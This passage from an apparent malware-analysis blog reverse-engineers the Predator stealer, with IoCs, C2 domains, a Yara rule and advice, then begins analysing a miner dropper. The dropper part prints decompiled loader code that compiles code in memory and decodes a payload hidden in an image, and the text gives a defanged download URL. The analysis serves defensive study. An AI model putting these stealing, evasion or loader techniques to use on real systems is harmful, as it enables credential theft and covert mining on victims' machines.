
Predator The Thief: In-depth analysis (v2.3.5)

15 October 2018 at 13:46
By: fumko

Well, it’s been a long time without fresh content on my blog. Some unexpected problems and a lot of work (like my tracker) kept me away from here. But it’s time to come back (slowly) with some stuff.

So today, this is an in-depth analysis of one stealer: “Predator the thief”, written in C/C++. Like dozens of other malware families, it is sold ready to use and delivered as a builder & C2 panel package.

The goal is to explain step by step how this malware works, with a lot of extra explanations for some parts. This post is mainly aimed at junior reverse engineers or malware analysts who want to understand and defeat some of these techniques/tricks easily in the future.

So here we go!

Classical life cycle

The execution order is almost the same for most stealers nowadays. The differences are mostly in the evasion techniques and in how they interact with the C2. For example, with Predator, the setup is quite simple but could vary if the attacker sets up a loader on his C2.

Diagram

The life cycle of Predator the thief

Preparing the field

Before stealing sensitive data, Predator starts by setting up some basic stuff to be able to work correctly. Almost all the configuration is loaded into memory step by step.

EntryPoint

So let’s put a breakpoint at “0x00472866” and inspect the code…

Call_Setup

  1. EBX is set to the length of our loop (in our case here, it will be 0x0F)
  2. ESI holds all the stored function addresses
  3. EAX grabs one address from ESI and moves it into EBP-8
  4. The address stored at EBP-8 is called; at this point, a config function unpacks some data and saves it onto the stack
  5. The ESI position is advanced by 4
  6. EDI is incremented until it reaches the value stored in EBX
  7. When EDI == EBX, all the required configuration values are stored on the stack. The main part of the malware can start
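
To make the loop above easier to picture, here is a minimal Python sketch of the same dispatch pattern. It is only a simulation: `run_setup`, `load_c2` and `load_folder` are hypothetical names, the stored values are placeholders, and the real sample works on registers and the native stack, not on a Python list.

```python
def run_setup(function_table):
    """Call every config function in order and collect what each one stores."""
    stack = []                     # stand-in for the real stack
    count = len(function_table)    # EBX: number of entries (0x0F in the sample)
    index = 0                      # EDI: loop counter
    while index != count:
        handler = function_table[index]   # EAX <- [ESI], then ESI += 4
        handler(stack)                    # the called function decodes one value
        index += 1                        # EDI += 1
    return stack


# Hypothetical config functions; the values are placeholders, not real IoCs.
def load_c2(stack):
    stack.append("c2.example.invalid")


def load_folder(stack):
    stack.append("\\ptst")


print(run_setup([load_c2, load_folder]))
```

Once the loop has walked the whole table, every configuration value is available and the main routine can run.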

So, for example, let’s see what we have inside 0040101D at 0x00488278

So with x32dbg, let’s see what we have… with a simple command

Command: go 0x0040101D

As you can see, this is where the C2 is stored, decoded and saved onto the stack.

C2

So what values are stored with this technique?

  • C2 Domain
  • %APPDATA% Folder
  • Predator Folder
  • Temporary name and location of the Predator archive file
  • Name of the archive when it is sent to the C2
  • etc…

With the help of the %APPDATA%/Roaming path, the Predator folder is created (\ptst). Notably, this name is hardcoded behind a XORed string and not generated randomly. As pure speculation, it could be short for “Predator The STealer”.

The same observation applies to the name of the temporary archive file used during the stealing process: “zpar.zip”.

The welcome message…

When you are positioned at the main module of the stealer, a lovely text, looped over 0x06400000 times, is addressed to people who want to reverse it.

welcome

Obfuscation Techniques

The thief who loves XOR (a little bit too much…)

Almost all the strings in this stealer sample are XORed, even though this obfuscation technique is really easy to understand and one of the easiest to decrypt. Here, it’s used in multiple forms just to slow down the analysis.
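
As a rough illustration of why XORed strings only slow an analyst down, here is a small Python sketch. The key `0x5a` and the helper names are my own assumptions for the demo (the real keys are not given in this post); the point is simply that a known fragment such as “.dll” is enough to recover a one-byte key.

```python
def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the repeating key (encode == decode)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def guess_single_byte_key(data: bytes, crib: bytes):
    """Return the first one-byte key whose output contains the crib, else None."""
    for key in range(256):
        if crib in xor_decode(data, bytes([key])):
            return key
    return None


# Build a sample the way an obfuscator would, using an illustrative key.
blob = xor_decode(b"kernel32.dll", b"\x5a")
key = guess_single_byte_key(blob, b".dll")
print(key, xor_decode(blob, bytes([key])))
```

The same function both encodes and decodes, which is why dumping the strings after the decryption routine has run is usually the quickest approach.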

GetProcAddress Alternatives

To avoid calling library functions directly, it uses a classic trick: it searches step by step for a specific API function and stores its address in a register. This hides the direct call to the function behind a simple register call.

So first, a XORed string (a DLL name) is decrypted. In this case, kernel32.dll is required for the specific function that the malware wants to call.

Step_1_API

When the decryption is done, this library is loaded with the help of “LoadLibraryA”. Then a clear-text string is pushed into EDX: “CreateDirectoryA”… This is the function that the stealer wants to use.

The only thing it needs now is to retrieve the address of the exported function “CreateDirectoryA” from kernel32.dll. Usually, this is done with the help of GetProcAddress, but this function is in fact not called and another trick is used to get the right value.

Step_2_API

So this string and the IMAGE_DOS_HEADER of kernel32.dll are passed to “func_GetProcesAddress_0”. The idea is to manually get the pointer to the function address that we want with the help of the Export Table. So let’s see what we have in it…

struct IMAGE_EXPORT_DIRECTORY {
	long Characteristics;
	long TimeDateStamp;
	short MajorVersion;
	short MinorVersion;
	long Name;
	long Base;
	long NumberOfFunctions;
	long NumberOfNames;
	long *AddressOfFunctions;    // <= This good boy
	long *AddressOfNames;        // <= This good boy
	long *AddressOfNameOrdinals; // <= This good boy
};

After inspecting the IMAGE_EXPORT_DIRECTORY structure, three fields are essential:

  • AddressOfFunctions – An array that contains the relative virtual addresses (RVA) of the functions of the module.
  • AddressOfNames – An array that stores, in ascending order, the names of all functions exported by this module.
  • AddressOfNameOrdinals – A 16-bit array that contains the ordinals associated with the function names in AddressOfNames.

source

So after saving the absolute position of these 3 arrays, the loop is simple:

Function_Get

  1. Grab the RVA of one function
  2. Get the name of this function
  3. Compare the string with the desired one.

So let’s look at it in detail to understand everything:

If we dig into ds:[eax+edx*4], this is where all the relative virtual addresses of the kernel32.dll export table functions are stored.

RVA
The next instruction, add eax,ecx, moves to the exact position of the string value in the “AddressOfNames” array.

DLLBaseAddress + AddressOfNameRVA[i] = Function Name 
   751F0000    +       0C41D4        = CreateDirectoryA

Address of names

The comparison matches, so now it needs to store the “procAddress”. First, the ordinal number of the function is saved. Then, with the help of this value, the function address position is grabbed and saved into ESI.

ADD           ESI, ECX
ProcAddress = Function Address + DLLBaseAddress

In disassembly, it looks like this :

GetProcAddress

Let’s inspect the code at the specific procAddress…

Check_01

Step_END_API

So everything is done, the address of the function is now stored into EAX and it only needs now to be called.
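
The whole lookup can be summarized with a short Python simulation. This is a sketch under assumptions: the three export arrays are modelled as plain lists, the RVAs are made up, and only the base address 0x751F0000 comes from the walkthrough above. A real implementation would read these arrays from the mapped PE image.

```python
def resolve_export(base, names, name_ordinals, functions, wanted):
    """Return the absolute address of `wanted`, or None if it is not exported."""
    for index, name in enumerate(names):
        if name == wanted:                    # string comparison from the loop
            ordinal = name_ordinals[index]    # 16-bit index into functions
            return base + functions[ordinal]  # RVA + DLL base = procAddress
    return None


# Toy export table. The base is the one from the walkthrough; RVAs are made up.
BASE = 0x751F0000
NAMES = ["CreateDirectoryA", "CreateFileA"]   # AddressOfNames (sorted)
NAME_ORDINALS = [1, 0]                        # AddressOfNameOrdinals
FUNCTIONS = [0x2000, 0x1000]                  # AddressOfFunctions (RVAs)

address = resolve_export(BASE, NAMES, NAME_ORDINALS, FUNCTIONS, "CreateDirectoryA")
print(hex(address))
```

Note that the name index is not used directly on the function array: it first goes through the ordinal array, which is exactly the extra step seen in the disassembly.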

Anti-VM Technique

A simple Anti-VM technique is used here to check whether the stealer is launched on a virtual machine. This is also the only anti-detection trick used by Predator.

Anti_VM_01

First, User32.dll (XORed) is dynamically loaded with the help of “LoadLibraryA”. Then the “EnumDisplayDevicesA” function is requested from User32.dll. The idea here is to get the value of the “Device Description” of the current display.

When it’s done, the result is checked against some values (obviously XORed too):

  • Hyper-V
  • VMware
  • VirtualBox

regedit_hyperv

If the string matches, you are redirected to a function renamed here “func_VmDetectedGoodBye”.
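
To check quickly whether a lab machine would trip this test, the comparison can be sketched in a few lines of Python. This assumes a case-sensitive substring match, which is my guess and not something confirmed from the disassembly; `looks_like_vm` is a hypothetical helper name and the device descriptions are examples.

```python
# Marker strings listed above; the matching rule itself is an assumption.
VM_MARKERS = ("Hyper-V", "VMware", "VirtualBox")


def looks_like_vm(device_description: str) -> bool:
    """Return True when the display description contains a known VM marker."""
    return any(marker in device_description for marker in VM_MARKERS)


for description in ("VMware SVGA 3D", "NVIDIA GeForce GTX 1080"):
    print(description, "->", looks_like_vm(description))
```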

How to By-Pass this Anti-VM technique?

To bypass this simple trick, the goal is to change the REG_SZ value of “DriverDesc” under {4d36e968-e325-11ce-bfc1-08002be10318} to something else.

regedit_bypass

And voilà!

Troll

Stealing Part

Let’s talk about the main subject… How this stealer is organized… As far as I could tell from disassembling the code, these are all the folders that the malware sets up in the “ptst” directory before sending it as an archive to the C2.

  • Folder
    • Files: Contains all classic text/document files found at specific paths
    • FileZilla: Grabs one or two files from this FTP client
    • WinFTP: Grabs one file from this FTP client
    • Cookies: Stolen cookies saved from different browsers
    • General: Generic Data
    • Steam: Steal login account data
    • Discord: Steal login account data
  • Files
    • Information.log
    • Screenshot.jpeg <= Screenshot of the current screen

Telegram

To check whether Telegram is installed on the machine, the malware checks whether the key path “Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1” exists.

So what do we have inside this key path? After digging into the code, the stealer requests the value of “InstallLocation”, because this is where Telegram is currently installed on the machine.

Install

Step by step, the path is recreated (as always, all strings are XORed):

  • %TELEGRAM_PATH%
  • \Telegram Desktop
  • \tdata
  • \D877F783D5D3EF8C

map file

The folder “D877F783D5D3EF8C” is where all the Telegram cache is stored. This is the sensitive data that the stealer wants to grab. During the process, the file map* (e.g. map1) is also checked; this file is, in fact, the encryption key. So if someone grabs everything from this folder, the attacker gains access (login without prompt) to the victim’s account.

Steam

The technique used by the stealer to get information from one piece of software remains the same for the next ones (in most cases). This greatly facilitates the understanding of this malware.

So first, it checks the “SteamPath” value at “HKCU\Software\Valve\Steam” to grab the correct Steam directory. This value is then concatenated with a bunch of file names that are necessary to compromise a Steam account.

So it first checks whether ssfn files are present on the machine with the help of “func_FindFiles”. If so, they are copied into the temporary malware folder stored in %APPDATA%/XXXX. Then it does the same thing with config.vdf.

XOR_3

So what’s the point of these files? First, after some research, a post on Reddit was quite interesting: it explained that ssfn files make it possible to bypass SteamGuard during user log-on.

Steam

Now what’s the point of the second file? This is where you can find some information about the user account and all the applications installed on the machine. Also, if the ConnectCache field is found in it, it is possible to log into the stolen account without the Steam authentication prompt. If you are curious, this pattern looks like this:

"ConnectCache"
{
    "STEAM_USERNAME_IN_CRC32_FORMAT" "SOME_HEX_STUFF"
}

The last file that the stealer wants to grab is “loginusers.vdf”. This one could be used for multiple purposes, but mainly for manually setting the account in offline mode.

XOR_4

For more details on the subject, there is a nice report made by Kaspersky:

Wallets

The stealer is supporting multiple digital wallets such as :

  • Ethereum
  • Multibit
  • Electrum
  • Armory
  • Bytecoin
  • Bitcoin
  • Etc…

The functionality is rudimentary, but it’s enough to grab specific files such as:

  • *.wallet
  • *.dat

And as usual, all the strings are XORed.

Wallet

FTP software

The stealer supports two FTP clients:

  • Filezilla
  • WinFTP

It’s really rudimentary because it only searches for three files, and if they are available, they are simply copied into the Predator folder:

  • %APPDATA%\Filezilla\sitemanager.xml
  • %APPDATA%\Filezilla\recentservers.xml
  • %PROGRAMFILES%\WinFtp Client\Favorites.dat

Browsers

There’s no need for a deeper explanation of which files the stealer targets in browsers. There are currently a dozen articles that explain how this kind of malware manages to steal web data. I recommend you read this article by @coldshell for a well-detailed overview.

As usual, popular Chrome-based & Firefox-based browsers and also Opera are mainly targeted by Predator.

This is the current official list supported by this stealer :

  • Amigo
  • BlackHawk
  • Chromium
  • Comodo Dragon
  • Cyberfox
  • Epic Privacy Browser
  • Google Chrome
  • IceCat
  • K-Meleon
  • Kometa
  • Maxthon5
  • Mozilla Firefox
  • Nichrome
  • Opera
  • Orbitum
  • Pale Moon
  • Sputnik
  • Torch
  • Vivaldi
  • Waterfox
  • Etc…

This one also uses SQLite to extract data from browsers and saves it into a temporary file named “vlmi{lulz}yg.col”.

sqlite

So the task is simple :

  • Steal the browser’s SQLite file
  • Extract data with the help of SQLite and put it into a temporary file
  • Then read it and save it into a text file with a specific name (for each browser).

cookies

When form data or credentials are found, they’re saved into three files in the General directory:

  • forms.log
  • password.log
  • cards.log

General

Discord

If Discord is detected on the machine, the stealer searches for the “https_discordapp_*localstorage” file and copies it into the “ptst” folder. This file contains all the sensitive information about the account and could permit authentication without a login prompt if it is pushed into the correct directory on the attacker’s machine.

Discord_Part1Discord_Part2Discord_Part3

Predator is inspecting multiple places…

This stealer steals data from 3 strategic folders:

  • Desktop
  • Downloads
  • Documents

Each time, the task is the same: it searches for 4 types of files with the help of GetFileAttributesA:

  • *.doc
  • *.docx
  • *.txt
  • *.log

When a file matches, it is copied into a folder named “Files”.

Information.log

When these tasks are done, the malware generates a summary file named “Information.log”, which contains some specific and sensitive data from the victim machine. For DFIR, this file is the artifact that identifies the malware, because it contains its name and specific version.

So first, it writes the Username of the user that has executed the payload, the computer name, and the OS Version.

User name: lolilol
Machine name: Computer 
OS version: Windoge 10

Then it copies the content of the clipboard with the help of GetClipboardData

Current clipboard: 
-------------- 
Omelette du fromage

Let’s continue the process…

Startup folder: C:\Users\lolilol\AppData\Local\Temp\predator.exe

Some classic specifications of the machine are requested and saved into the file.

CPU info: Some bad CPU | Amount of kernels: 128 (Current CPU usage: 46.112917%) 
GPU info: Fumik0_ graphical display 
Amount of RAM: 12 GB (Current RAM usage: 240 MB) 
Screen resolution: 1900x1005

Then, all the user accounts are indicated

Computer users: 
lolilol 
Administrator 
All Users 
Default 
Default User 
Public

The last part is about some exotic information that is quite awkward in fact… Firstly, for some reason that I don’t want to understand, the compile time is hardcoded in the payload.

Compile Time

Then the second exotic data saved into Information.log is the grabbing time, i.e. the execution time spent stealing content from the machine… This information could be useful for debugging some tweaks to the features.

Additional information:
Compile time: Aug 31 2018
Grabbing time: 0.359375 second(s)

C2 Communications

To finish Information.log, a GET request is made to get some network data about the victim…

First, it sets up the request by decoding some data like:

  • A user-agent
  • The content-type

UA

  • The API URL ( /api/info.get )

We can have for example this result :

Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;

When the request is done, the data is consolidated step by step with the help of different loops and conditions.

GET01

When the task is done, they are saved into Information.log

City: Nopeland 
Country:  NopeCountry
Coordinates: XX.XXXX N, X.XXXX W 
IP: XXX.XXX.XXX.XXX 
Timezone: Nowhere 
Zip code: XXXXX
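
For analysts who capture this traffic, the semicolon-separated answer is easy to split back into fields. The sketch below is only a convenience parser: the field order is inferred by lining up the sample response with the labels written to Information.log, and the names in `FIELDS` are my own.

```python
# Field order inferred from the sample response and the Information.log labels.
FIELDS = ("city", "country", "latitude", "longitude", "ip", "timezone", "zip_code")


def parse_info_response(body: str) -> dict:
    """Split an /api/info.get style answer into named fields."""
    parts = body.strip().rstrip(";").split(";")
    if len(parts) != len(FIELDS):
        raise ValueError("unexpected number of fields: %d" % len(parts))
    return dict(zip(FIELDS, parts))


sample = "Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;"
for name, value in parse_info_response(sample).items():
    print(name, "=", value)
```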

The archive is now complete; the stealer only needs to send it to the C2.

zpar.zip

So now it sets up some pieces of information in the gate.get request with specific arguments, from p1 to p7, for example:

  • p1: Number of accounts stolen
  • p2: Number of cookies stolen
  • p4: Number of forms stolen
  • etc…

results :

Request

The POST request is now complete, the stealer will clean everything and quit.

Panel_C2_Example

Example of Predator C2 Panel with fancy background…

Update – v2.3.7

So during the analysis, new versions were pushed… Currently (at the time this post was written), v3 has been released, but since I don’t have this specific version, I won’t say anything about it and will focus only on 2.3.7.

It’s useless to review it from scratch: the mechanics of this stealer are still the same, and only some tweaks or other arrangements were made for multiple purposes… Without digging too much into it, let’s see some changes (not all) that I found interesting.

changelog

Changelog of v2.3.7 explained by the author

As usual, these are the same patterns:

  • Code optimizations (Faster / Lightweight)
  • More features…

As you can see v2.3.7 on the right is much longer than v2.3.5 (left), but the backbone is still the same.

Mutex

In 2.3.7, a mutex is integrated with a specific string called “SyystemServs”

Xor / Obfuscated Strings

XOR_v2

During the C2 requests, URL arguments are generated byte by byte and un-XORed.

For example :

push 04
...
push 61
...
push 70
...
leads to this 
HEX    : 046170692F676174652E6765743F70313D
STRING : .api/gate.get?p1=

This is basic and simple, but enough to slow down the review of the strings. At least it’s really easy to uncover, so it doesn’t matter.
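
Once the pushed bytes are collected from the disassembly, turning them back into text takes a couple of lines of Python. This small sketch reuses the hex string shown above; `render_ascii` is just a hypothetical helper that prints non-printable bytes as dots, like a hex editor would.

```python
def render_ascii(raw: bytes) -> str:
    """Show printable ASCII as-is and everything else as a dot."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)


pushed = "046170692F676174652E6765743F70313D"
print(render_ascii(bytes.fromhex(pushed)))  # .api/gate.get?p1=
```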

This tweak by far is why the code is much longer than v2.3.5.

Loader

Not seen before (as far as I saw), 2.3.7 seems to integrate a loader feature to push another payload onto the victim machine, easily recognizable by the corresponding GET request

/api/download.get

This API request lets the malware get a URL in text format. It then downloads the file, saves it to disk and executes it with the help of ShellExecuteA

Loader

There are also some other tweaks, but it’s unnecessary to detail them in this review; I leave this task to you if you are curious 🙂

IoC

v2.3.5

  • 299f83d5a35f17aa97d40db667a52dcc | Sample Packed
  • 3cb386716d7b90b4dca1610afbd5b146 | Sample Unpacked
  • kent-adam.myjino.ru | C2 Domain

v2.3.7

  • cbcc48fe0fa0fd30cb4c088fae582118 | Sample Unpacked
  • denbaliberdin.myjino.ru | C2 Domain

HTTP Patterns

  • GET – /api/info.get
  • POST – /api//gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X
  • GET – /api/download.get
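
These patterns are simple enough to hunt for in proxy logs. Here is a minimal Python sketch, assuming you already have the HTTP method and the request URI for each log entry; `classify_request` and the regular expression are my own and only cover the three endpoints listed above (with one or more slashes after /api).

```python
import re

# One or more slashes after /api, as seen in the gate.get pattern above.
PREDATOR_URI = re.compile(r"^/api/+(info|gate|download)\.get(?:\?.*)?$")
EXPECTED_METHOD = {"info": "GET", "gate": "POST", "download": "GET"}


def classify_request(method: str, uri: str):
    """Return the matching endpoint name, or None if the request does not fit."""
    match = PREDATOR_URI.match(uri)
    if match is None:
        return None
    endpoint = match.group(1)
    if method.upper() != EXPECTED_METHOD[endpoint]:
        return None
    return endpoint


print(classify_request("POST", "/api//gate.get?p1=1&p2=2&p3=0&p4=0&p5=0&p6=0&p7=0"))
print(classify_request("GET", "/index.html"))
```

A hit on its own is only a lead: combine it with the C2 domains and hashes before drawing conclusions.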

MITRE ATT&CK

v2.3.5

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed

v2.3.7

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed
  • Execution –  Execution through API

Author / Threat Actor

  • Alexuiop1337

Yara Rule

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief v2.3.5 & +"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2018/12/19"

    strings:
        $mz = { 4D 5A }

        // V2
        $hex1 = { BF 00 00 40 06 } 
        $hex2 = { C6 04 31 6B }
        $hex3 = { C6 04 31 63 }
        $hex4 = { C6 04 31 75 }
        $hex5 = { C6 04 31 66 }
 
        $s1 = "sqlite_" ascii wide
 
        // V3
        $x1 = { C6 84 24 ?? ?? 00 00 8C } 
        $x2 = { C6 84 24 ?? ?? 00 00 1A }  
        $x3 = { C6 84 24 ?? ?? 00 00 D4 } 
        $x4 = { C6 84 24 ?? ?? 00 00 03 }  
        $x5 = { C6 84 24 ?? ?? 00 00 B4 } 
        $x6 = { C6 84 24 ?? ?? 00 00 80 }
 
    condition:
        $mz at 0 and 
        ( ( all of ($hex*) and all of ($s*) ) or (all of ($x*)))
}


Recommendations

  • Always run suspicious stuff inside a VM, and be sure to install a lot of components linked to the hypervisor (like Guest Additions tools) to trigger as many Anti-VM checks as possible and make the malware close itself. When you are done with your activities, stop the VM and restore it to a clean snapshot.
  • Avoid storing files at predictable paths (Desktop, Documents, Downloads); put them somewhere uncommon.
  • Avoid cracks and other stupid fake hacks; stealers usually hide behind the current gaming trends (especially these days with Fortnite…).
  • Use containers for the software you are using; this reduces the risk of data theft.
  • Flush your browser after each visit, and never save your passwords directly in your browser or use auto-fill features.
  • Don’t use the same password for all your websites (and use 2FA if it’s possible). We are in 2018, and sadly this is still everywhere.
  • Make some noise with your data; this forces attackers to lose time hunting for accurate values among the junk information.
  • Use a password vault.
  • Troll/Not Troll: Learn Russian and put your keyboard in Cyrillic 🙂

Conclusion

Stealers are not sophisticated malware, but they are effective enough to cause irreversible damage to victims. Email accounts and other credentials are more and more impactful, and this will get worse over the years. Behaviors must change in account management to limit this kind of scenario. Awareness and good practices are the keys; a simple security software solution will not solve everything.

Well for me I’ve enough work, it’s time to sleep a little…

Himouto Habits

#HappyHunting

Update 2018-10-23 : Yara Rules now working also for v3

Some fun with a miner

21 May 2018 at 08:39
By: fumko

A few weeks ago I came across a piece of malware that made me want to dig deeper into it. It has a curious way of deploying itself: it sets up a miner on the machine and hides it behind some legit processes.

For example, when we look at Process Hacker:

  • Visual Basic Compiler is launched for no reason
  • An awkward child process “Notepad.exe” is consuming a lot of CPU

process_hacker

At first glance, my first thought was “What the heck is going on there?”

First stage

It all begins with a sample available at this address:

hxxp://netload.trade/ghghdshch130.exe

This is a .NET application that starts at this EntryPoint:

static void StatusBarPanelCollection(string[] args) {
	ToolStripItemEventArgs.ExprVisitorBase().EntryPoint.Invoke(null, null);
}

The first thing called behind is an Assembly method named ExprVisitorBase().

public static Assembly ExprVisitorBase() {
  CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider();
  CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(new CompilerParameters
    {
      IncludeDebugInformation = true,
      GenerateExecutable = false,
      GenerateInMemory = true,
      ReferencedAssemblies = 
        {
          string.Format(.POasdIsd("U3lzdGVtLkRyYXdpbmcuZGxs"), new object[0])
        },
        CompilerOptions = string.Format(.POasdIsd("L29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1ZysgL3RhcmdldDp3aW5leGU="), new object[0])
    }, new string[]
    {
      ToolStripItemEventArgs.SizeSoapParameterAttribute.Replace(string.Format(.POasdIsd("I3Jlc25hbWUj"), new object[0]), 
      .POasdIsd("ekp5blhVaktUbFpw")).Replace(string.Format(.POasdIsd("I3Bhc3Mj"), new object[0]), .POasdIsd("VVVlb0NvaXBHdVZj"))
    });
  return compilerResults.CompiledAssembly;
}

This program is going to programmatically compile some code. Indeed, it is possible in .NET to access the C# compiler with the help of the CSharpCodeProvider class. The call to CompileAssemblyFromSource is where the assembly gets compiled. This method takes the parameters object (CompilerParameters) and the source code, which is a string.

First, if we look deeper into the CompilerParameters object, the configuration tells us that the new program will be a DLL file and that there will be no trace on disk. It requires a specific reference to be able to work, but the string is obfuscated and needs “POasdIsd” to be decoded.

internal class 
{
 	public static string POasdIsd(string string_0)
	{
		byte[] bytes = Convert.FromBase64String(string_0);
		return Encoding.UTF8.GetString(bytes);
	}
}

It’s easy to see that “POasdIsd” is just a Base64 decode function, and our encoded string is, in fact, “System.Drawing.dll”. So this reference is required to compile the source code.
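
The same decoding is trivial to reproduce outside the debugger. This short Python sketch mirrors what “POasdIsd” does (Base64 decode, then UTF-8) and runs it over the encoded strings visible in ExprVisitorBase(); the Python function name is mine.

```python
import base64


def po_asd_isd(encoded: str) -> str:
    """Python equivalent of the sample's helper: Base64 decode, then UTF-8."""
    return base64.b64decode(encoded).decode("utf-8")


ENCODED_STRINGS = [
    "U3lzdGVtLkRyYXdpbmcuZGxs",
    "L29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1ZysgL3RhcmdldDp3aW5leGU=",
    "I3Jlc25hbWUj",
    "ekp5blhVaktUbFpw",
    "I3Bhc3Mj",
    "VVVlb0NvaXBHdVZj",
]

for encoded in ENCODED_STRINGS:
    print(encoded, "->", po_asd_isd(encoded))
```

Among the results, the two placeholders “#resname#” and “#pass#” are replaced in the source template before compilation, and the second replacement value is the XOR key seen in the next stage.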

If we continue the analysis, it sets some compiler arguments. Decoded, they show that the code will be compiled in debug mode for an x86 platform:

/optimize+ /platform:X86 /debug+ /target:winexe

So now the only thing needed is the source code. It’s stored in the variable SizeSoapParameterAttribute, which is of course also obfuscated with Base64 encoding and additionally encrypted with a XOR key (5).

public static string SizeSoapParameterAttribute = 
    ToolStripItemEventArgs.ASSEMBLY_FLAGS(
        .POasdIsd("cHZsa2IlVnx2c ... D4ID3gPeCUID3g="), 5
);
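
The two layers can be peeled off statically as well. The sketch below assumes that ASSEMBLY_FLAGS simply XORs every decoded byte with the integer key, which is my reading and not shown in this post. Only the first eight characters of the blob are used here because the rest is elided, and they already decode to the start of a C# file.

```python
import base64


def decode_source(blob_b64: str, key: int) -> str:
    """Base64 decode, then XOR every byte with a one-byte key (assumed scheme)."""
    raw = base64.b64decode(blob_b64)
    return bytes(b ^ key for b in raw).decode("utf-8")


# Only the visible start of the blob; the full string is elided in the post.
print(repr(decode_source("cHZsa2Il", 5)))  # 'using '
```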

If we place some breakpoints in the debugger, we can see, step by step, the generated C# source code

Generating_cs

Give me my source code, please…

When everything is done, the compilation can take place. We can see that with Process Monitor.

procmon.png

Second stage

At this stage, the DLL is compiled and loaded into memory. No need to extract and decompile it because we have the code! So if we look deeper into it, this file contains a lot of spaghetti code, but the main class is easy to find.

Second_code.png

When we rename some functions, the goal of this library becomes clearer.

private static string xorKey = "UUeoCoipGuVc";
private static byte[] Payload;

...

private static void Main()
{
  try
  {
    IntPtr hResInfo = Program.FindResource(new IntPtr(0), new IntPtr(138), new IntPtr(23));
    uint size = Program.SizeofResource(new IntPtr(0), hResInfo);
    IntPtr hResData = Program.LoadResource(new IntPtr(0), hResInfo);
    IntPtr source = Program.LockResource(hResData);
    Program.Payload = new byte[size];
    Marshal.Copy(source, Program.Payload, 0, Convert.ToInt32(size));
    Program.Payload = Program.XOR(Program.ConvertFromBmp(Program.Byte2Image(Program.Payload)));
    Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader));
    thread.Start();
  }
  catch
  {
  }
}

So when it’s loaded into memory, it requests an HTML resource (IntPtr(23) is RT_HTML) from the main program. If you debug this DLL on its own in dnSpy, it will crash because it targets a resource that does not exist in it. So let’s go back a bit to “ghghdshch130.exe” and inspect .rsrc. We have a curious file named 138 (which is the resource ID)

138 RT

So if we inspect it, this is a PNG file with a 461 x 461 dimension, 8-bit/color RGBA, non-interlaced.

Image.png

So now let the magic happen… With the code seen above, this image is converted into a byte array and then again into an image (Bitmap format). The main reason is to be able to use ConvertFromBmp, the most important function of the DLL file. Its goal is to reorganize the different sections of the payload properly in memory with the help of BlockCopy: it copies pixel by pixel to the correct destination offset, 4 bytes at a time.

I cleaned up the code to make the steps clear.

private static byte[] ConvertFromBmp(Bitmap imageFile) { 
 int width = imageFile.Width; 
 int correctSize = width * width * 4; 
 byte[] correctOffset = new byte[correctSize]; 
 int size = 0; 
 for (int x = 0; x < width; x++) { 
   for (int y = 0; y < width; y++) { 
     Buffer.BlockCopy(BitConverter.GetBytes(imageFile.GetPixel(x, y).ToArgb()), 0, correctOffset, size, 4); 
     size += 4; 
   } 
 }

 int finalSize = BitConverter.ToInt32(correctOffset, 0); 
 byte[] XorPayload = new byte[finalSize]; 
 Buffer.BlockCopy(correctOffset, 4, XorPayload, 0, XorPayload.Length); 
 
 return XorPayload; 
}
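
For anyone who prefers to unpack the resource offline, here is a hedged Python port of the same logic. To stay self-contained it takes a `get_pixel_argb(x, y)` callback instead of a real image library, so reading the PNG is left to you; the function names and the synthetic 2x2 "image" are assumptions for the demo, not part of the sample.

```python
import struct


def rebuild_payload(width, get_pixel_argb):
    """Rebuild the embedded blob from a square image, column by column."""
    raw = bytearray()
    for x in range(width):
        for y in range(width):
            # ToArgb() yields 0xAARRGGBB; GetBytes() stores it little-endian.
            raw += struct.pack("<I", get_pixel_argb(x, y) & 0xFFFFFFFF)
    (final_size,) = struct.unpack_from("<i", raw, 0)   # first 4 bytes: length
    if not 0 <= final_size <= len(raw) - 4:
        raise ValueError("embedded length does not fit in the image")
    return bytes(raw[4:4 + final_size])


# Synthetic 2x2 "image" carrying a 10-byte blob, for demonstration only.
blob = b"MZ\x90\x00hello!"
data = (struct.pack("<i", len(blob)) + blob).ljust(16, b"\x00")
words = struct.unpack("<4I", data)
restored = rebuild_payload(2, lambda x, y: words[x * 2 + y])
print(restored == blob)
```

The output is still XOR-encrypted at this point in the real sample, so it has to go through the XOR routine before it looks like a PE file.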

So now our payload is almost done; it just has to be decrypted with a specific XOR key, in this case the value “UUeoCoipGuVc”

internal class Program
{
    private static byte[] XOR(byte[] bytes)
    {
        // Encoding.Unicode is UTF-16LE: each key character becomes two bytes
        byte[] bytes2 = Encoding.Unicode.GetBytes(Program.xorKey);
        for (int i = 0; i < bytes.Length; i++)
        {
            bytes[i] ^= bytes2[i % 16];
        }
        return bytes;
    }
}
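
Two details of this routine are easy to miss, so here is a small Python equivalent to make them visible. It is a sketch that mirrors the C# above with the key “UUeoCoipGuVc”; the function name is mine. Because the key is encoded as UTF-16LE and the index is taken modulo 16, only the first 8 characters of the key are ever used, and every second key byte is 0x00.

```python
def xor_payload(data: bytes, key: str = "UUeoCoipGuVc") -> bytes:
    """XOR data with the UTF-16LE bytes of the key, cycling over 16 bytes."""
    key_bytes = key.encode("utf-16-le")     # same as Encoding.Unicode
    return bytes(b ^ key_bytes[i % 16] for i, b in enumerate(data))


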